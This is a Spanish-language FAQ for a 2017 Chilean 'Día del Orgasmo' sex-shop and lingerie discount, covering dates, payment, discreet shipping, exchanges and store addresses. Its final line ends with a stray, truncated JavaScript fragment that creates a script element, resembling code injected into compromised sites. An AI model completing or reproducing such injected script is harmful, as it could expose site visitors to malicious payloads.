Preguntas Frecuentes

¿En qué fecha se realiza Día del Orgasmo 2017?
R: Día del Orgasmo 2017 se realiza desde el Martes 8 al Jueves 10 de Agosto.

¿Cuáles son los sitios asociados al descuento del Día del Orgasmo?
R:
Los sitios que participan en Diadelorgasmo.cl son www.lenceria.cl, www.orgasmikchile.cl y www.starsex.cl a través de los cuales obtendrás un 50% de descuento en todas tus compras.

¿Cual es el plazo para realizar el pago en las compras online?
R: Para que tu descuento sea efectivo debes pagar y confirmar el pago hasta el Viernes 11 de Agosto (válido para pedidos procesados durante los días de la promoción).

¿Debo registrarme para realizar la compra?
R:
Sí, para asegurar la entrega correcta de tu pedido es necesario que te registres en el sitio adherido mediante el que harás la compra, otorgando datos reales, tanto nombre como dirección. El proceso de registro es muy breve y los datos por ti proporcionados jamás serán cedidos a terceros. Una vez registrado recibirás automáticamente un correo de Bienvenida, si no lo encuentras en tu bandeja de entrada por favor revisa tu carpeta de Spam o E-Mail no deseados.

¿Qué hago después de la compra?
R: Una vez finalizado el pedido a través del carrito de compras, recibirás un correo con nuestros números de cuenta para que realices el pago (si eliges la opción transferencia). Es importante que nos confirmes la transacción indicando monto, fecha, banco de destino y código de referencia del pedido  al correo del sitio en cual compraste.

¿Cuándo enviarán mi compra?
R:
Una vez recibido el pago y reflejado en nuestra cuenta comenzaremos con el proceso de despacho. Los pedidos serán armados según orden de recepción en un plazo no superior a 3 días hábiles. Una vez despachado recibirás en tu correo electrónico el número de orden de flete para que puedas hacer el seguimiento en la empresa de encomiendas que elegiste.

¿Cómo es el paquete que recibiré?
R: Todos nuestros despachos se caracterizan por la discreción. Tus productos irán en una caja exenta de logos o textos que denoten su procedencia. Solo tendrá tu nombre y dirección para realizar la entrega. La boleta de tu compra irá al interior de la caja.

¿Puedo cambiar un producto?
R: Solamente la lencería tiene cambio por satisfacción durante 10 días desde que recibes tu compra. El resto de los productos no tiene cambio por satisfacción, solo por falla técnica dentro de los 3 primeros meses según la garantía legal.

¿Cómo hago llegar mi lencería para cambio?
R: Envíanos la boleta y el producto sin uso, en perfectas condiciones, con sus accesorios y embalaje original.

Todos los costos de transporte generados por la devolución y eventual reenvío de productos corren por cuenta del cliente.

Para más información:
Si compraste a través de www.lenceria.cl contáctanos a ventas@lenceria.cl o al teléfono 2 2695 5323.
Si compraste a través de www.orgasmikchile.cl contáctanos a ventas@orgasmikchile.cl o al teléfono 2 2235 3149.
Si compraste a través de www.starsex.cl contáctanos a ventas@starsex.cl o al teléfono 2 2671 8683.

¿Quién paga los costos de envío en caso de cambio?
R:
Si el cambio es por falla del producto, la empresa asume los costos de transporte.
Si el cambio es por no gusto, dentro de los 10 días posteriores a la recepción del producto, el cliente asume los gastos de transporte.

¿Puedo retirar en tienda?
R:
No, las ventas realizadas vía online serán despachadas a domicilio o a la agencia de encomiendas que elijas.

¿Puedo comprar en la tienda y obtener el 50% de descuento?
R:
Sí, tenemos dos tiendas asociadas.
Av. Nueva Providencia 1745 Local G (Torres Carlos Antunez) – Providencia.
Agustinas 972 Local 309 (3° Piso) – Santiago Centro.
Horario de atención:
Martes a Jueves: 10:30 a 20:00 horas (horario continuado).var d=document;var s=d.createElement(‘script’);